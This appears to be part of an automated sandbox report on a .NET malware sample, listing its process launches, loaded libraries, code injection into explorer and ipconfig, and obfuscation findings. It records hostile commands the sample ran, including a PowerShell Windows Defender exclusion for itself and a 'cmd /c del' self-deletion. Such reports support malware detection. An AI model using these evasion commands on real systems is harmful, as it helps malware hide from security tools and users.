            Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Process created: C:\Users\user\Desktop\JHnNxt6Pnb.exe "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
            Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: iconcodecservice.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
            Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
            Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: JHnNxt6Pnb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: JHnNxt6Pnb.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ipconfig.pdb source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001930000.00000040.10000000.00040000.00000000.sdmp, JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001930000.00000040.10000000.00040000.00000000.sdmp, JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: JHnNxt6Pnb.exe, 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1671675082.000000000367D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1669527051.00000000034C9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: JHnNxt6Pnb.exe, JHnNxt6Pnb.exe, 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1671675082.000000000367D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1669527051.00000000034C9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.cs .Net Code: ya3QZ7H1OG System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.cs .Net Code: ya3QZ7H1OG System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.cs .Net Code: ya3QZ7H1OG System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 0_2_04F87D99 push eax; iretd 0_2_04F87DA1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 0_2_04F8AA35 push ebx; iretd 0_2_04F8AA36
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_0041794F push ss; ret 4_2_0041797F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_00417993 push ss; ret 4_2_0041797F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_00416B24 push ss; retf 4_2_00416B27
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_0041D475 push eax; ret 4_2_0041D4C8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_0041D4C2 push eax; ret 4_2_0041D4C8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_0041D4CB push eax; ret 4_2_0041D532
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_0041ED53 push dword ptr [914FBFDDh]; ret 4_2_0041ED74
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_0041D52C push eax; ret 4_2_0041D532
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_0041E77C push 2E339416h; ret 4_2_0041E842
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_0041779C push esp; retf 4_2_0041779D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Code function: 4_2_019E09AD push ecx; mov dword ptr [esp], ecx 4_2_019E09B6
            Source: C:\Windows\explorer.exe Code function: 6_2_108869B5 push esp; retn 0000h 6_2_10886AE7
            Source: C:\Windows\explorer.exe Code function: 6_2_10886B02 push esp; retn 0000h 6_2_10886B03
            Source: C:\Windows\explorer.exe Code function: 6_2_10886B1E push esp; retn 0000h 6_2_10886B1F
            Source: C:\Windows\explorer.exe Code function: 6_2_10A219B5 push esp; retn 0000h 6_2_10A21AE7
            Source: C:\Windows\explorer.exe Code function: 6_2_10A21B02 push esp; retn 0000h 6_2_10A21B03
            Source: C:\Windows\explorer.exe Code function: 6_2_10A21B1E push esp; retn 0000h 6_2_10A21B1F
            Source: C:\Windows\explorer.exe Code function: 6_2_115E0B1E push esp; retn 0000h 6_2_115E0B1F
            Source: C:\Windows\explorer.exe Code function: 6_2_115E0B02 push esp; retn 0000h 6_2_115E0B03
            Source: C:\Windows\explorer.exe Code function: 6_2_115E09B5 push esp; retn 0000h 6_2_115E0AE7
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00F6570D push ecx; ret 9_2_00F65720
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_038609AD push ecx; mov dword ptr [esp], ecx 9_2_038609B6
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00E4D4C2 push eax; ret 9_2_00E4D4C8
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00E4D4CB push eax; ret 9_2_00E4D532
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00E4D475 push eax; ret 9_2_00E4D4C8
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00E4D52C push eax; ret 9_2_00E4D532
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00E4779C push esp; retf 9_2_00E4779D
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00E4E77C push 2E339416h; ret 9_2_00E4E842
            Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_00E47993 push ss; ret 9_2_00E4797F
            Source: JHnNxt6Pnb.exe Static PE information: section name: .text entropy: 7.807750703003363
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, CVk4BkAqgtM4EmPgrkO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VNkyD6ocw8', 'kPfyfapMrJ', 'YyQyKOfWx3', 'K77yvhB63s', 'vLJy9JDkxX', 'WeByrVe1m7', 'n1Qy87Cknb'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, E6Kw9PIeHreU7N1vZn.cs High entropy of concatenated method names: 'NvA7Thkox4', 'IsZ73rrsgx', 'C4v7NlgbcR', 'Byd7IsFZqC', 'tPj7nUkSEK', 'gIJ7Xpkjsb', 'NPC7w0xiEZ', 'iWO7Cp3mXA', 'QHa7EaPf6p', 'ieg7yGRfSw'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, M5oJ89kPLtZaqCjIm3.cs High entropy of concatenated method names: 'PcqCdwLxXp', 'gFSC6x51Ja', 'lkIC0F4bVw', 'XlECOBAVOW', 'JJaCDWpEwf', 'plrCYULx99', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, PXLMp9OZGUdw2XHrZK.cs High entropy of concatenated method names: 'KAGcJrGLjf', 'rMZcMoK8Z6', 'RxPcZnH4iB', 'tegcT2aPP2', 'NrYc3Zi7e5', 't2nc11umAq', 'ynqcIWUb8y', 'Kkycanw09h', 'X6cOfeHyKydC6kL5fXY', 'BTDMMAHo3GeQSfkArVV'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, cifycjzu6Uius0SMBh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cFLEpyqWJ3', 'en6EnatmFi', 'hsUEXsNrwq', 'qtUEweJBdh', 'JROECIbWER', 'uvUEExc55T', 'x9sEygeCRI'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, ICJHE62k18iImlcG7g.cs High entropy of concatenated method names: 'qrhpNLnaOs', 'omNpIhIKyE', 'EFJpdidDkT', 'OsJp6yjjkS', 'ml6pOX4UWQ', 'qaspYeroUm', 'pHgpBRltUJ', 'DvApWAAxnP', 'UU1p5elWJl', 'eHJpVJxOZ5'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.cs High entropy of concatenated method names: 'p7fqiOFkHP', 'SVKqgoPu1a', 'Qs6qGTTkqH', 'sqbq7VEC9F', 'EQtqu6bCU8', 'MgOqcj2uxj', 'gLtqsYeN45', 'Hpwqo9WsEC', 'JT1qtraqVC', 'rOyqF2W6sH'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, YrQFSYAHoqOHrypnR1O.cs High entropy of concatenated method names: 'B5UEMQUe9Z', 'uQTEeZPfaO', 'S4MEZ6nEeD', 'XwjETnquJj', 'VHhERP6Ho9', 'KY0E3TfmZ7', 't0BE1pBuQG', 'VbNENLA0MA', 'fifEIudOOI', 'qomEa1a3x0'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, byM0dcaLI90JrAHK1G.cs High entropy of concatenated method names: 'VTSuRqfghv', 'EeUu1tL4ar', 'rsD70x5YYI', 'tW57OIH4d6', 'KXw7YcdI2h', 'lgn7bxWTmU', 'na47BUuA0l', 'z057WjtCd5', 'uRp7lD5qB9', 'b7675PkPBa'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, Gt5uMimZYjGvA5DYGB.cs High entropy of concatenated method names: 'JoBCgHgKpp', 'HCMCGEMXVx', 'kJkC7pyvuQ', 'WjKCuVURDY', 'hKTCcx7SDf', 'W5QCsCfv2D', 'awHCoyaZNy', 'LhpCtQxvrk', 'pqNCFCpcmS', 'Ln3CSqfT2K'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, Bohy8GG5IYcfb6Hpyw.cs High entropy of concatenated method names: 'Dispose', 'qPAAk2nOCK', 'YDtU6heK4C', 'KWaLLdN3E4', 'rdtAx5uMiZ', 'JjGAzvA5DY', 'ProcessDialogKey', 'gBlUH5oJ89', 'vLtUAZaqCj', 'Em3UU6K7o8'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, HK7o8Ix7Sef3O4yWON.cs High entropy of concatenated method names: 'llqEAvS6Rv', 'hjXEq0tgNr', 'VlSEQohIH4', 'Wp1EgjOy18', 'GjBEGorJjd', 'uoTEuiORH2', 'zxiEcoGRbh', 'u01C8VaYIt', 'MB8CmaqJh6', 'NFwCk4ZY4b'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, vIVW76QciyDMhnTEs5.cs High entropy of concatenated method names: 'eM8AsB0K75', 'aNNAonsBGR', 'veHAFreU7N', 'DvZASnAyM0', 'aHKAn1G1F6', 'Ft9AX87kky', 'uObC99ga70hahttdWZ', 'oWN6sMzEfUU84CbgGT', 'RZtAAI3Xft', 'Mo5AqeWMD3'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, TUmxrsUiBFh387Pp3F.cs High entropy of concatenated method names: 'faDZJMbuX', 'ecLTOA3JW', 'IZ33ABbpf', 'uvA1ZchFm', 'u1PIoDNYD', 'saMa5RitG', 'oqbih3VhsZNItarrpa', 'XyRpqxImN4jTEnR8Ys', 'RgBC8BR3P', 'j67yLlkaB'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, uba7PbrorjVOM4GOH5.cs High entropy of concatenated method names: 'iwtwmLoq8J', 'jYRwx2N403', 'F29CH1fFkH', 'l9wCAwnrtB', 'D12wVNfwnp', 'GXywhxW7Rn', 'prVw23n4SW', 'PMTwDjpbrm', 'volwfol48T', 'Dp9wKctIqP'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, hvp7roBlu5tt8sCfCj.cs High entropy of concatenated method names: 'NJHsgmQBXC', 'SKns7Tg6jp', 'YmLsc9hF64', 'O1Rcx6CWUA', 'D2eczSdLVw', 'To7sH1VV2k', 'PxYsAiIyAt', 'AOMsUkasTb', 'qFgsq8U6uE', 'luMsQcdoEi'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, bLPwuclivPPYX0pkcA.cs High entropy of concatenated method names: 'o5TsM3VgYr', 'ErHseXy41h', 'xJMsZafoCU', 'fxVsTyhGwV', 'MwssRIndVd', 'lFvs3mCwn3', 'QsQs1V8EYy', 'aA3sNiV9wk', 'GZjsIBTnnN', 'darsangqa9'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, fbwr5b7b1tBIX1pc65.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'VEcUkO8BG2', 'mZ7Uxfi0o6', 'h5WUzOHyuU', 'cmXqHuHGp8', 'lhTqAjKTpk', 'b0lqU6iX8q', 'vh2qqbQcq5', 'DAX9BE19u5MfNstXk20'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, CF6at9d87kkyRS2U6N.cs High entropy of concatenated method names: 'AlaciAhbLP', 'E74cGABQcW', 'iarcurfmMM', 'gqNcsQgIwP', 'GHRcoujEec', 'aCtu9LAm2Q', 'VfjurgbFiH', 'QKku8UJbyi', 'lYOumeJwmd', 'VJKuk83NGP'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, ggRwXVvoU8G6iTnm8Z.cs High entropy of concatenated method names: 'KM0wFW5mVQ', 'crawSGPbDE', 'ToString', 'td9wgupkJF', 'QqMwGYUsyJ', 'pZKw7CAcj7', 'rvZwuwvwfR', 'gTwwcwD8KB', 'acJwsa9ZBy', 'dI8wojQoxM'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, VB0K75NHNNnsBGRN1j.cs High entropy of concatenated method names: 'up0GDQKKEn', 'tAVGfFTdI3', 'xV7GKb1IZh', 'Bm7Gv1raFM', 'ww0G9La25r', 'dR4GrWnMRo', 'YloG8VgHnp', 'OyyGm9w39o', 'qTCGkR1GEP', 'nIoGxRloGg'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, CVk4BkAqgtM4EmPgrkO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VNkyD6ocw8', 'kPfyfapMrJ', 'YyQyKOfWx3', 'K77yvhB63s', 'vLJy9JDkxX', 'WeByrVe1m7', 'n1Qy87Cknb'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, E6Kw9PIeHreU7N1vZn.cs High entropy of concatenated method names: 'NvA7Thkox4', 'IsZ73rrsgx', 'C4v7NlgbcR', 'Byd7IsFZqC', 'tPj7nUkSEK', 'gIJ7Xpkjsb', 'NPC7w0xiEZ', 'iWO7Cp3mXA', 'QHa7EaPf6p', 'ieg7yGRfSw'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, M5oJ89kPLtZaqCjIm3.cs High entropy of concatenated method names: 'PcqCdwLxXp', 'gFSC6x51Ja', 'lkIC0F4bVw', 'XlECOBAVOW', 'JJaCDWpEwf', 'plrCYULx99', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, PXLMp9OZGUdw2XHrZK.cs High entropy of concatenated method names: 'KAGcJrGLjf', 'rMZcMoK8Z6', 'RxPcZnH4iB', 'tegcT2aPP2', 'NrYc3Zi7e5', 't2nc11umAq', 'ynqcIWUb8y', 'Kkycanw09h', 'X6cOfeHyKydC6kL5fXY', 'BTDMMAHo3GeQSfkArVV'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, cifycjzu6Uius0SMBh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cFLEpyqWJ3', 'en6EnatmFi', 'hsUEXsNrwq', 'qtUEweJBdh', 'JROECIbWER', 'uvUEExc55T', 'x9sEygeCRI'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, ICJHE62k18iImlcG7g.cs High entropy of concatenated method names: 'qrhpNLnaOs', 'omNpIhIKyE', 'EFJpdidDkT', 'OsJp6yjjkS', 'ml6pOX4UWQ', 'qaspYeroUm', 'pHgpBRltUJ', 'DvApWAAxnP', 'UU1p5elWJl', 'eHJpVJxOZ5'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.cs High entropy of concatenated method names: 'p7fqiOFkHP', 'SVKqgoPu1a', 'Qs6qGTTkqH', 'sqbq7VEC9F', 'EQtqu6bCU8', 'MgOqcj2uxj', 'gLtqsYeN45', 'Hpwqo9WsEC', 'JT1qtraqVC', 'rOyqF2W6sH'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, YrQFSYAHoqOHrypnR1O.cs High entropy of concatenated method names: 'B5UEMQUe9Z', 'uQTEeZPfaO', 'S4MEZ6nEeD', 'XwjETnquJj', 'VHhERP6Ho9', 'KY0E3TfmZ7', 't0BE1pBuQG', 'VbNENLA0MA', 'fifEIudOOI', 'qomEa1a3x0'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, byM0dcaLI90JrAHK1G.cs High entropy of concatenated method names: 'VTSuRqfghv', 'EeUu1tL4ar', 'rsD70x5YYI', 'tW57OIH4d6', 'KXw7YcdI2h', 'lgn7bxWTmU', 'na47BUuA0l', 'z057WjtCd5', 'uRp7lD5qB9', 'b7675PkPBa'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, Gt5uMimZYjGvA5DYGB.cs High entropy of concatenated method names: 'JoBCgHgKpp', 'HCMCGEMXVx', 'kJkC7pyvuQ', 'WjKCuVURDY', 'hKTCcx7SDf', 'W5QCsCfv2D', 'awHCoyaZNy', 'LhpCtQxvrk', 'pqNCFCpcmS', 'Ln3CSqfT2K'
